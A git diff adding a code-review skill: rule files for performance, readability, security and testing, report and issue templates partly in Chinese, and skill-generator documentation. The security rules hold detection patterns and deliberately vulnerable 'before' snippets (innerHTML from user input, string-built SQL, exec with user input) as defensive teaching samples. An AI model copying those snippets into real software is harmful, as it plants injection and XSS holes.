if (rule.negativePatterns?.some(np => match.context.includes(np))) {
|
||||
continue;
|
||||
}
|
||||
findings.push({
|
||||
id: `${rules.prefix}-${counter++}`,
|
||||
severity: rule.severity,
|
||||
category: rule.category,
|
||||
description: rule.description,
|
||||
recommendation: rule.recommendation,
|
||||
fixExample: rule.fixExample
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Adding New Rules
|
||||
|
||||
1. Identify the appropriate dimension
|
||||
2. Create rule with unique `id` within dimension
|
||||
3. Choose appropriate `patternType`
|
||||
4. Provide clear `description` and `recommendation`
|
||||
5. Include practical `fixExample`
|
||||
6. Test against sample code
|
||||
|
||||
## Rule Maintenance
|
||||
|
||||
- Review rules quarterly for relevance
|
||||
- Update patterns as language/framework evolves
|
||||
- Track false positive rates
|
||||
- Collect feedback from users
|
||||
@@ -0,0 +1,59 @@
|
||||
{
|
||||
"dimension": "performance",
|
||||
"prefix": "PERF",
|
||||
"description": "Rules for detecting performance issues including inefficient algorithms, memory leaks, and resource waste",
|
||||
"rules": [
|
||||
{
|
||||
"id": "nested-loops",
|
||||
"category": "algorithm-complexity",
|
||||
"severity": "medium",
|
||||
"pattern": "for\\s*\\([^)]+\\)\\s*\\{[^}]*for\\s*\\([^)]+\\)|forEach\\s*\\([^)]+\\)\\s*\\{[^}]*forEach",
|
||||
"patternType": "regex",
|
||||
"description": "Nested loops may indicate O(n^2) or worse complexity. Consider if this can be optimized",
|
||||
"recommendation": "Use Map/Set for O(1) lookups, break early when possible, or restructure the algorithm",
|
||||
"fixExample": "// Before - O(n^2)\nfor (const a of listA) {\n for (const b of listB) {\n if (a.id === b.id) { ... }\n }\n}\n\n// After - O(n)\nconst bMap = new Map(listB.map(b => [b.id, b]));\nfor (const a of listA) {\n const b = bMap.get(a.id);\n if (b) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-in-loop",
|
||||
"category": "inefficient-operation",
|
||||
"severity": "high",
|
||||
"pattern": "\\.includes\\s*\\(|indexOf\\s*\\(|find\\s*\\(",
|
||||
"patternType": "includes",
|
||||
"contextPattern": "for|while|forEach|map|filter|reduce",
|
||||
"description": "Array search methods inside loops cause O(n*m) complexity. Consider using Set or Map",
|
||||
"recommendation": "Convert array to Set before the loop for O(1) lookups",
|
||||
"fixExample": "// Before - O(n*m)\nfor (const item of items) {\n if (existingIds.includes(item.id)) { ... }\n}\n\n// After - O(n)\nconst idSet = new Set(existingIds);\nfor (const item of items) {\n if (idSet.has(item.id)) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "synchronous-io",
|
||||
"category": "io-efficiency",
|
||||
"severity": "high",
|
||||
"pattern": "readFileSync|writeFileSync|execSync|spawnSync",
|
||||
"patternType": "includes",
|
||||
"description": "Synchronous I/O blocks the event loop and degrades application responsiveness",
|
||||
"recommendation": "Use async versions (readFile, writeFile) or Promise-based APIs",
|
||||
"fixExample": "// Before\nconst data = fs.readFileSync(path);\n\n// After\nconst data = await fs.promises.readFile(path);\n// or\nfs.readFile(path, (err, data) => { ... });"
|
||||
},
|
||||
{
|
||||
"id": "memory-leak-closure",
|
||||
"category": "memory-leak",
|
||||
"severity": "high",
|
||||
"pattern": "addEventListener\\s*\\(|setInterval\\s*\\(|setTimeout\\s*\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["removeEventListener", "clearInterval", "clearTimeout"],
|
||||
"description": "Event listeners and timers without cleanup can cause memory leaks",
|
||||
"recommendation": "Always remove event listeners and clear timers in cleanup functions (componentWillUnmount, useEffect cleanup)",
|
||||
"fixExample": "// Before\nuseEffect(() => {\n window.addEventListener('resize', handler);\n}, []);\n\n// After\nuseEffect(() => {\n window.addEventListener('resize', handler);\n return () => window.removeEventListener('resize', handler);\n}, []);"
|
||||
},
|
||||
{
|
||||
"id": "unnecessary-rerender",
|
||||
"category": "react-performance",
|
||||
"severity": "medium",
|
||||
"pattern": "useState\\s*\\(\\s*\\{|useState\\s*\\(\\s*\\[",
|
||||
"patternType": "regex",
|
||||
"description": "Creating new object/array references in useState can cause unnecessary re-renders",
|
||||
"recommendation": "Use useMemo for computed values, useCallback for functions, or consider state management libraries",
|
||||
"fixExample": "// Before - new object every render\nconst [config] = useState({ theme: 'dark' });\n\n// After - stable reference\nconst defaultConfig = useMemo(() => ({ theme: 'dark' }), []);\nconst [config] = useState(defaultConfig);"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "readability",
|
||||
"prefix": "READ",
|
||||
"description": "Rules for detecting code readability issues including naming, complexity, and documentation",
|
||||
"rules": [
|
||||
{
|
||||
"id": "long-function",
|
||||
"category": "function-length",
|
||||
"severity": "medium",
|
||||
"pattern": "function\\s+\\w+\\s*\\([^)]*\\)\\s*\\{|=>\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"lineThreshold": 50,
|
||||
"description": "Functions longer than 50 lines are difficult to understand and maintain",
|
||||
"recommendation": "Break down into smaller, focused functions. Each function should do one thing well",
|
||||
"fixExample": "// Before - 100 line function\nfunction processData(data) {\n // validation\n // transformation\n // calculation\n // formatting\n // output\n}\n\n// After - composed functions\nfunction processData(data) {\n const validated = validateData(data);\n const transformed = transformData(validated);\n return formatOutput(calculateResults(transformed));\n}"
|
||||
},
|
||||
{
|
||||
"id": "single-letter-variable",
|
||||
"category": "naming",
|
||||
"severity": "low",
|
||||
"pattern": "(?:const|let|var)\\s+[a-z]\\s*=",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["for\\s*\\(", "\\[\\w,\\s*\\w\\]", "catch\\s*\\(e\\)"],
|
||||
"description": "Single letter variable names reduce code readability except in specific contexts (loop counters, catch)",
|
||||
"recommendation": "Use descriptive names that convey the variable's purpose",
|
||||
"fixExample": "// Before\nconst d = getData();\nconst r = d.map(x => x.value);\n\n// After\nconst userData = getData();\nconst userValues = userData.map(user => user.value);"
|
||||
},
|
||||
{
|
||||
"id": "deep-nesting",
|
||||
"category": "complexity",
|
||||
"severity": "high",
|
||||
"pattern": "\\{[^}]*\\{[^}]*\\{[^}]*\\{",
|
||||
"patternType": "regex",
|
||||
"description": "Deeply nested code (4+ levels) is hard to follow and maintain",
|
||||
"recommendation": "Use early returns, extract functions, or flatten conditionals",
|
||||
"fixExample": "// Before\nif (user) {\n if (user.permissions) {\n if (user.permissions.canEdit) {\n if (document.isEditable) {\n // do work\n }\n }\n }\n}\n\n// After\nif (!user?.permissions?.canEdit) return;\nif (!document.isEditable) return;\n// do work"
|
||||
},
|
||||
{
|
||||
"id": "magic-number",
|
||||
"category": "magic-value",
|
||||
"severity": "low",
|
||||
"pattern": "[^\\d]\\d{2,}[^\\d]|setTimeout\\s*\\([^,]+,\\s*\\d{4,}\\)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["const", "let", "enum", "0x", "100", "1000"],
|
||||
"description": "Magic numbers without explanation make code hard to understand",
|
||||
"recommendation": "Extract magic numbers into named constants with descriptive names",
|
||||
"fixExample": "// Before\nif (status === 403) { ... }\nsetTimeout(callback, 86400000);\n\n// After\nconst HTTP_FORBIDDEN = 403;\nconst ONE_DAY_MS = 24 * 60 * 60 * 1000;\nif (status === HTTP_FORBIDDEN) { ... }\nsetTimeout(callback, ONE_DAY_MS);"
|
||||
},
|
||||
{
|
||||
"id": "commented-code",
|
||||
"category": "dead-code",
|
||||
"severity": "low",
|
||||
"pattern": "//\\s*(const|let|var|function|if|for|while|return)\\s+",
|
||||
"patternType": "regex",
|
||||
"description": "Commented-out code adds noise and should be removed. Use version control for history",
|
||||
"recommendation": "Remove commented code. If needed for reference, add a comment explaining why with a link to relevant commit/issue",
|
||||
"fixExample": "// Before\n// function oldImplementation() { ... }\n// const legacyConfig = {...};\n\n// After\n// See PR #123 for previous implementation\n// removed 2024-01-01"
|
||||
}
|
||||
]
|
||||
}
|
||||
58
.claude/skills/review-code/specs/rules/security-rules.json
Normal file
@@ -0,0 +1,58 @@
|
||||
{
|
||||
"dimension": "security",
|
||||
"prefix": "SEC",
|
||||
"description": "Rules for detecting security vulnerabilities including XSS, injection, and credential exposure",
|
||||
"rules": [
|
||||
{
|
||||
"id": "xss-innerHTML",
|
||||
"category": "xss-risk",
|
||||
"severity": "critical",
|
||||
"pattern": "innerHTML\\s*=|dangerouslySetInnerHTML",
|
||||
"patternType": "includes",
|
||||
"description": "Direct HTML injection via innerHTML or dangerouslySetInnerHTML can lead to XSS vulnerabilities",
|
||||
"recommendation": "Use textContent for plain text, or sanitize HTML input using a library like DOMPurify before injection",
|
||||
"fixExample": "// Before\nelement.innerHTML = userInput;\n<div dangerouslySetInnerHTML={{__html: data}} />\n\n// After\nelement.textContent = userInput;\n// or\nimport DOMPurify from 'dompurify';\nelement.innerHTML = DOMPurify.sanitize(userInput);"
|
||||
},
|
||||
{
|
||||
"id": "hardcoded-secret",
|
||||
"category": "hardcoded-secret",
|
||||
"severity": "critical",
|
||||
"pattern": "(?:password|secret|api[_-]?key|token|credential)\\s*[=:]\\s*['\"][^'\"]{8,}['\"]",
|
||||
"patternType": "regex",
|
||||
"caseInsensitive": true,
|
||||
"description": "Hardcoded credentials detected in source code. This is a security risk if code is exposed",
|
||||
"recommendation": "Use environment variables, secret management services, or configuration files excluded from version control",
|
||||
"fixExample": "// Before\nconst apiKey = 'sk-1234567890abcdef';\n\n// After\nconst apiKey = process.env.API_KEY;\n// or\nconst apiKey = await getSecretFromVault('api-key');"
|
||||
},
|
||||
{
|
||||
"id": "sql-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "query\\s*\\(\\s*[`'\"].*\\$\\{|execute\\s*\\(\\s*[`'\"].*\\+",
|
||||
"patternType": "regex",
|
||||
"description": "String concatenation or template literals in SQL queries can lead to SQL injection",
|
||||
"recommendation": "Use parameterized queries or prepared statements with placeholders",
|
||||
"fixExample": "// Before\ndb.query(`SELECT * FROM users WHERE id = ${userId}`);\n\n// After\ndb.query('SELECT * FROM users WHERE id = ?', [userId]);\n// or\ndb.query('SELECT * FROM users WHERE id = $1', [userId]);"
|
||||
},
|
||||
{
|
||||
"id": "command-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "exec\\s*\\(|execSync\\s*\\(|spawn\\s*\\([^,]*\\+|child_process",
|
||||
"patternType": "regex",
|
||||
"description": "Command execution with user input can lead to command injection attacks",
|
||||
"recommendation": "Validate and sanitize input, use parameterized commands, or avoid shell execution entirely",
|
||||
"fixExample": "// Before\nexec(`ls ${userInput}`);\n\n// After\nexecFile('ls', [sanitizedInput], options);\n// or use spawn with {shell: false}"
|
||||
},
|
||||
{
|
||||
"id": "insecure-random",
|
||||
"category": "cryptography",
|
||||
"severity": "high",
|
||||
"pattern": "Math\\.random\\(\\)",
|
||||
"patternType": "includes",
|
||||
"description": "Math.random() is not cryptographically secure and should not be used for security-sensitive operations",
|
||||
"recommendation": "Use crypto.randomBytes() or crypto.getRandomValues() for security-critical random generation",
|
||||
"fixExample": "// Before\nconst token = Math.random().toString(36);\n\n// After\nimport crypto from 'crypto';\nconst token = crypto.randomBytes(32).toString('hex');"
|
||||
}
|
||||
]
|
||||
}
|
||||
59
.claude/skills/review-code/specs/rules/testing-rules.json
Normal file
@@ -0,0 +1,59 @@
|
||||
{
|
||||
"dimension": "testing",
|
||||
"prefix": "TEST",
|
||||
"description": "Rules for detecting testing issues including coverage gaps, test quality, and mock usage",
|
||||
"rules": [
|
||||
{
|
||||
"id": "missing-assertion",
|
||||
"category": "test-quality",
|
||||
"severity": "high",
|
||||
"pattern": "(?:it|test)\\s*\\([^)]+,\\s*(?:async\\s*)?\\(\\)\\s*=>\\s*\\{[^}]*\\}\\s*\\)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["expect", "assert", "should", "toBe", "toEqual"],
|
||||
"description": "Test case without assertions always passes and provides no value",
|
||||
"recommendation": "Add assertions to verify expected behavior. Each test should have at least one meaningful assertion",
|
||||
"fixExample": "// Before\nit('should process data', async () => {\n await processData(input);\n});\n\n// After\nit('should process data', async () => {\n const result = await processData(input);\n expect(result.success).toBe(true);\n expect(result.data).toHaveLength(3);\n});"
|
||||
},
|
||||
{
|
||||
"id": "hardcoded-test-data",
|
||||
"category": "test-maintainability",
|
||||
"severity": "low",
|
||||
"pattern": "expect\\s*\\([^)]+\\)\\.toBe\\s*\\(['\"][^'\"]{20,}['\"]\\)",
|
||||
"patternType": "regex",
|
||||
"description": "Long hardcoded strings in assertions are brittle and hard to maintain",
|
||||
"recommendation": "Use snapshots for large outputs, or extract expected values to test fixtures",
|
||||
"fixExample": "// Before\nexpect(result).toBe('very long expected string that is hard to maintain...');\n\n// After\nexpect(result).toMatchSnapshot();\n// or\nconst expected = loadFixture('expected-output.json');\nexpect(result).toEqual(expected);"
|
||||
},
|
||||
{
|
||||
"id": "no-error-test",
|
||||
"category": "coverage-gap",
|
||||
"severity": "medium",
|
||||
"pattern": "describe\\s*\\([^)]+",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["throw", "reject", "error", "fail", "catch"],
|
||||
"description": "Test suite may be missing error path testing. Error handling is critical for reliability",
|
||||
"recommendation": "Add tests for error cases: invalid input, network failures, edge cases",
|
||||
"fixExample": "// Add error path tests\nit('should throw on invalid input', () => {\n expect(() => processData(null)).toThrow('Invalid input');\n});\n\nit('should handle network failure', async () => {\n mockApi.mockRejectedValue(new Error('Network error'));\n await expect(fetchData()).rejects.toThrow('Network error');\n});"
|
||||
},
|
||||
{
|
||||
"id": "test-implementation-detail",
|
||||
"category": "test-quality",
|
||||
"severity": "medium",
|
||||
"pattern": "toHaveBeenCalledWith|toHaveBeenCalledTimes",
|
||||
"patternType": "includes",
|
||||
"description": "Testing implementation details (call counts, exact parameters) makes tests brittle to refactoring",
|
||||
"recommendation": "Prefer testing observable behavior and outcomes over internal implementation",
|
||||
"fixExample": "// Before - brittle\nexpect(mockService.process).toHaveBeenCalledTimes(3);\nexpect(mockService.process).toHaveBeenCalledWith('exact-arg');\n\n// After - behavior-focused\nexpect(result.items).toHaveLength(3);\nexpect(result.processed).toBe(true);"
|
||||
},
|
||||
{
|
||||
"id": "skip-test",
|
||||
"category": "test-coverage",
|
||||
"severity": "high",
|
||||
"pattern": "it\\.skip|test\\.skip|xit|xdescribe|describe\\.skip",
|
||||
"patternType": "regex",
|
||||
"description": "Skipped tests indicate untested code paths or broken functionality",
|
||||
"recommendation": "Fix or remove skipped tests. If temporarily skipped, add TODO comment with issue reference",
|
||||
"fixExample": "// Before\nit.skip('should handle edge case', () => { ... });\n\n// After - either fix it\nit('should handle edge case', () => {\n // fixed implementation\n});\n\n// Or document why skipped\n// TODO(#123): Re-enable after API migration\nit.skip('should handle edge case', () => { ... });"
|
||||
}
|
||||
]
|
||||
}
|
||||
186
.claude/skills/review-code/templates/issue-template.md
Normal file
@@ -0,0 +1,186 @@
|
||||
# Issue Template
|
||||
|
||||
问题记录模板。
|
||||
|
||||
## Single Issue Template
|
||||
|
||||
```markdown
|
||||
#### {{severity_emoji}} [{{id}}] {{category}}
|
||||
|
||||
- **严重程度**: {{severity}}
|
||||
- **维度**: {{dimension}}
|
||||
- **文件**: `{{file}}`{{#if line}}:{{line}}{{/if}}
|
||||
- **描述**: {{description}}
|
||||
|
||||
{{#if code_snippet}}
|
||||
**问题代码**:
|
||||
```{{language}}
|
||||
{{code_snippet}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
**建议**: {{recommendation}}
|
||||
|
||||
{{#if fix_example}}
|
||||
**修复示例**:
|
||||
```{{language}}
|
||||
{{fix_example}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
{{#if references}}
|
||||
**参考资料**:
|
||||
{{#each references}}
|
||||
- {{this}}
|
||||
{{/each}}
|
||||
{{/if}}
|
||||
```
|
||||
|
||||
## Issue Object Schema
|
||||
|
||||
```typescript
|
||||
interface Issue {
|
||||
id: string; // e.g., "SEC-001"
|
||||
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
|
||||
dimension: string; // e.g., "security"
|
||||
category: string; // e.g., "xss-risk"
|
||||
file: string; // e.g., "src/utils/render.ts"
|
||||
line?: number; // e.g., 42
|
||||
column?: number; // e.g., 15
|
||||
code_snippet?: string;
|
||||
description: string;
|
||||
recommendation: string;
|
||||
fix_example?: string;
|
||||
references?: string[];
|
||||
}
|
||||
```
|
||||
|
||||
## ID Generation
|
||||
|
||||
```javascript
|
||||
function generateIssueId(dimension, counter) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
|
||||
const prefix = prefixes[dimension] || 'MISC';
|
||||
const number = String(counter).padStart(3, '0');
|
||||
|
||||
return `${prefix}-${number}`;
|
||||
}
|
||||
```
|
||||
|
||||
## Severity Emojis
|
||||
|
||||
```javascript
|
||||
const SEVERITY_EMOJI = {
|
||||
critical: '🔴',
|
||||
high: '🟠',
|
||||
medium: '🟡',
|
||||
low: '🔵',
|
||||
info: '⚪'
|
||||
};
|
||||
```
|
||||
|
||||
## Issue Categories by Dimension
|
||||
|
||||
### Correctness
|
||||
- `null-check` - 缺少空值检查
|
||||
- `boundary` - 边界条件未处理
|
||||
- `error-handling` - 错误处理不当
|
||||
- `type-safety` - 类型安全问题
|
||||
- `logic-error` - 逻辑错误
|
||||
- `resource-leak` - 资源泄漏
|
||||
|
||||
### Security
|
||||
- `injection` - 注入风险
|
||||
- `xss` - 跨站脚本
|
||||
- `hardcoded-secret` - 硬编码密钥
|
||||
- `auth` - 认证授权
|
||||
- `sensitive-data` - 敏感数据
|
||||
|
||||
### Performance
|
||||
- `complexity` - 复杂度问题
|
||||
- `n+1-query` - N+1 查询
|
||||
- `memory-leak` - 内存泄漏
|
||||
- `blocking-io` - 阻塞 I/O
|
||||
- `inefficient-algorithm` - 低效算法
|
||||
|
||||
### Readability
|
||||
- `naming` - 命名问题
|
||||
- `function-length` - 函数过长
|
||||
- `nesting-depth` - 嵌套过深
|
||||
- `comments` - 注释问题
|
||||
- `duplication` - 代码重复
|
||||
|
||||
### Testing
|
||||
- `coverage` - 覆盖不足
|
||||
- `boundary-test` - 缺少边界测试
|
||||
- `test-isolation` - 测试不独立
|
||||
- `flaky-test` - 不稳定测试
|
||||
|
||||
### Architecture
|
||||
- `layer-violation` - 层次违规
|
||||
- `circular-dependency` - 循环依赖
|
||||
- `coupling` - 耦合过紧
|
||||
- `srp-violation` - 单一职责违规
|
||||
|
||||
## Example Issues
|
||||
|
||||
### Critical Security Issue
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"severity": "critical",
|
||||
"dimension": "security",
|
||||
"category": "xss",
|
||||
"file": "src/components/Comment.tsx",
|
||||
"line": 25,
|
||||
"code_snippet": "element.innerHTML = userComment;",
|
||||
"description": "直接使用 innerHTML 插入用户输入,存在 XSS 攻击风险",
|
||||
"recommendation": "使用 textContent 或对用户输入进行 HTML 转义",
|
||||
"fix_example": "element.textContent = userComment;\n// 或\nelement.innerHTML = DOMPurify.sanitize(userComment);",
|
||||
"references": [
|
||||
"https://owasp.org/www-community/xss-filter-evasion-cheatsheet"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### High Correctness Issue
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "CORR-003",
|
||||
"severity": "high",
|
||||
"dimension": "correctness",
|
||||
"category": "error-handling",
|
||||
"file": "src/services/api.ts",
|
||||
"line": 42,
|
||||
"code_snippet": "try {\n await fetchData();\n} catch (e) {}",
|
||||
"description": "空的 catch 块会静默吞掉错误,导致问题难以发现和调试",
|
||||
"recommendation": "记录错误日志或重新抛出异常",
|
||||
"fix_example": "try {\n await fetchData();\n} catch (e) {\n console.error('Failed to fetch data:', e);\n throw e;\n}"
|
||||
}
|
||||
```
|
||||
|
||||
### Medium Readability Issue
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "READ-007",
|
||||
"severity": "medium",
|
||||
"dimension": "readability",
|
||||
"category": "function-length",
|
||||
"file": "src/utils/processor.ts",
|
||||
"line": 15,
|
||||
"description": "函数 processData 有 150 行,超过推荐的 50 行限制,难以理解和维护",
|
||||
"recommendation": "将函数拆分为多个小函数,每个函数负责单一职责",
|
||||
"fix_example": "// 拆分为:\nfunction validateInput(data) { ... }\nfunction transformData(data) { ... }\nfunction saveData(data) { ... }"
|
||||
}
|
||||
```
|
||||
173
.claude/skills/review-code/templates/review-report.md
Normal file
@@ -0,0 +1,173 @@
|
||||
# Review Report Template
|
||||
|
||||
审查报告模板。
|
||||
|
||||
## Template Structure
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
## 审查概览
|
||||
|
||||
| 项目 | 值 |
|
||||
|------|------|
|
||||
| 目标路径 | `{{target_path}}` |
|
||||
| 文件数量 | {{file_count}} |
|
||||
| 代码行数 | {{total_lines}} |
|
||||
| 主要语言 | {{language}} |
|
||||
| 框架 | {{framework}} |
|
||||
| 审查时间 | {{review_duration}} |
|
||||
|
||||
## 问题统计
|
||||
|
||||
| 严重程度 | 数量 |
|
||||
|----------|------|
|
||||
| 🔴 Critical | {{critical_count}} |
|
||||
| 🟠 High | {{high_count}} |
|
||||
| 🟡 Medium | {{medium_count}} |
|
||||
| 🔵 Low | {{low_count}} |
|
||||
| ⚪ Info | {{info_count}} |
|
||||
| **总计** | **{{total_issues}}** |
|
||||
|
||||
### 按维度统计
|
||||
|
||||
| 维度 | 问题数 |
|
||||
|------|--------|
|
||||
| Correctness (正确性) | {{correctness_count}} |
|
||||
| Security (安全性) | {{security_count}} |
|
||||
| Performance (性能) | {{performance_count}} |
|
||||
| Readability (可读性) | {{readability_count}} |
|
||||
| Testing (测试) | {{testing_count}} |
|
||||
| Architecture (架构) | {{architecture_count}} |
|
||||
|
||||
---
|
||||
|
||||
## 高风险区域
|
||||
|
||||
{{#if risk_areas}}
|
||||
| 文件 | 原因 | 优先级 |
|
||||
|------|------|--------|
|
||||
{{#each risk_areas}}
|
||||
| `{{this.file}}` | {{this.reason}} | {{this.priority}} |
|
||||
{{/each}}
|
||||
{{else}}
|
||||
未发现明显的高风险区域。
|
||||
{{/if}}
|
||||
|
||||
---
|
||||
|
||||
## 问题详情
|
||||
|
||||
{{#each dimensions}}
|
||||
### {{this.name}}
|
||||
|
||||
{{#each this.findings}}
|
||||
#### {{severity_emoji this.severity}} [{{this.id}}] {{this.category}}
|
||||
|
||||
- **严重程度**: {{this.severity}}
|
||||
- **文件**: `{{this.file}}`{{#if this.line}}:{{this.line}}{{/if}}
|
||||
- **描述**: {{this.description}}
|
||||
|
||||
{{#if this.code_snippet}}
|
||||
```
|
||||
{{this.code_snippet}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
**建议**: {{this.recommendation}}
|
||||
|
||||
{{#if this.fix_example}}
|
||||
**修复示例**:
|
||||
```
|
||||
{{this.fix_example}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
---
|
||||
|
||||
{{/each}}
|
||||
{{/each}}
|
||||
|
||||
## 审查建议
|
||||
|
||||
### 必须修复 (Must Fix)
|
||||
|
||||
{{must_fix_summary}}
|
||||
|
||||
### 建议改进 (Should Fix)
|
||||
|
||||
{{should_fix_summary}}
|
||||
|
||||
### 可选优化 (Nice to Have)
|
||||
|
||||
{{nice_to_have_summary}}
|
||||
|
||||
---
|
||||
|
||||
*报告生成时间: {{generated_at}}*
|
||||
```
|
||||
|
||||
## Variable Definitions
|
||||
|
||||
| Variable | Type | Source |
|
||||
|----------|------|--------|
|
||||
| `{{target_path}}` | string | state.context.target_path |
|
||||
| `{{file_count}}` | number | state.context.file_count |
|
||||
| `{{total_lines}}` | number | state.context.total_lines |
|
||||
| `{{language}}` | string | state.context.language |
|
||||
| `{{framework}}` | string | state.context.framework |
|
||||
| `{{review_duration}}` | string | Formatted duration |
|
||||
| `{{critical_count}}` | number | Count of critical findings |
|
||||
| `{{high_count}}` | number | Count of high findings |
|
||||
| `{{medium_count}}` | number | Count of medium findings |
|
||||
| `{{low_count}}` | number | Count of low findings |
|
||||
| `{{info_count}}` | number | Count of info findings |
|
||||
| `{{total_issues}}` | number | Total findings |
|
||||
| `{{risk_areas}}` | array | state.scan_summary.risk_areas |
|
||||
| `{{dimensions}}` | array | Grouped findings by dimension |
|
||||
| `{{generated_at}}` | string | ISO timestamp |
|
||||
|
||||
## Helper Functions
|
||||
|
||||
```javascript
|
||||
function severity_emoji(severity) {
|
||||
const emojis = {
|
||||
critical: '🔴',
|
||||
high: '🟠',
|
||||
medium: '🟡',
|
||||
low: '🔵',
|
||||
info: '⚪'
|
||||
};
|
||||
return emojis[severity] || '⚪';
|
||||
}
|
||||
|
||||
function formatDuration(ms) {
|
||||
const minutes = Math.floor(ms / 60000);
|
||||
const seconds = Math.floor((ms % 60000) / 1000);
|
||||
return `${minutes}分${seconds}秒`;
|
||||
}
|
||||
|
||||
function generateMustFixSummary(findings) {
|
||||
const critical = findings.filter(f => f.severity === 'critical');
|
||||
const high = findings.filter(f => f.severity === 'high');
|
||||
|
||||
if (critical.length + high.length === 0) {
|
||||
return '未发现必须立即修复的问题。';
|
||||
}
|
||||
|
||||
return `发现 ${critical.length} 个严重问题和 ${high.length} 个高优先级问题,建议在合并前修复。`;
|
||||
}
|
||||
```
|
||||
|
||||
## Usage Example
|
||||
|
||||
```javascript
|
||||
const report = generateReport({
|
||||
context: state.context,
|
||||
summary: state.summary,
|
||||
findings: state.findings,
|
||||
scanSummary: state.scan_summary
|
||||
});
|
||||
|
||||
Write(`${workDir}/review-report.md`, report);
|
||||
```
|
||||
@@ -15,6 +15,9 @@ Meta-skill for creating new Claude Code skills with configurable execution modes
|
||||
│ Skill Generator Architecture │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ ⚠️ Phase 0: Specification → 阅读并理解设计规范 (强制前置) │
|
||||
│ Study SKILL-DESIGN-SPEC.md + 模板 │
|
||||
│ ↓ │
|
||||
│ Phase 1: Requirements → skill-config.json │
|
||||
│ Discovery (name, type, mode, agents) │
|
||||
│ ↓ │
|
||||
@@ -82,10 +85,63 @@ Phase 01 → Phase 02 → Phase 03 → ... → Phase N
|
||||
3. **规范遵循**: 严格遵循 `_shared/SKILL-DESIGN-SPEC.md`
|
||||
4. **可扩展性**: 生成的 Skill 易于扩展和修改
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何生成操作之前,**必须**完整阅读以下文档。未阅读规范直接生成将导致输出不符合质量标准。
|
||||
|
||||
### 核心规范 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | 通用设计规范 - 定义所有 Skill 的结构、命名、质量标准 | **P0 - 最高** |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md 入口文件模板 |
|
||||
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential Phase 模板 |
|
||||
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous 编排器模板 |
|
||||
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous Action 模板 |
|
||||
| [templates/code-analysis-action.md](templates/code-analysis-action.md) | 代码分析 Action 模板 |
|
||||
| [templates/llm-action.md](templates/llm-action.md) | LLM Action 模板 |
|
||||
| [templates/script-bash.md](templates/script-bash.md) | Bash 脚本模板 |
|
||||
| [templates/script-python.md](templates/script-python.md) | Python 脚本模板 |
|
||||
|
||||
### 规范文档 (按需阅读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [specs/execution-modes.md](specs/execution-modes.md) | 执行模式规范 |
|
||||
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill 需求规范 |
|
||||
| [specs/cli-integration.md](specs/cli-integration.md) | CLI 集成规范 |
|
||||
| [specs/scripting-integration.md](specs/scripting-integration.md) | 脚本集成规范 |
|
||||
|
||||
### Phase 执行指南 (执行时参考)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | 收集 Skill 需求 |
|
||||
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | 生成目录结构 |
|
||||
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | 生成 Phase 文件 |
|
||||
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | 生成规范和模板 |
|
||||
| [phases/05-validation.md](phases/05-validation.md) | 验证和文档 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置 - 禁止跳过) │
|
||||
│ → Read: ../_shared/SKILL-DESIGN-SPEC.md (通用设计规范) │
|
||||
│ → Read: templates/*.md (所有相关模板文件) │
|
||||
│ → 理解: Skill 结构规范、命名约定、质量标准 │
|
||||
│ → Output: 内化规范要求,确保后续生成符合标准 │
|
||||
│ ⛔ 未完成 Phase 0 禁止进入 Phase 1 │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 1: Requirements Discovery │
|
||||
│ → AskUserQuestion: Skill 名称、目标、执行模式 │
|
||||
│ → Output: skill-config.json │
|
||||
@@ -168,20 +224,3 @@ if (config.execution_mode === 'autonomous') {
|
||||
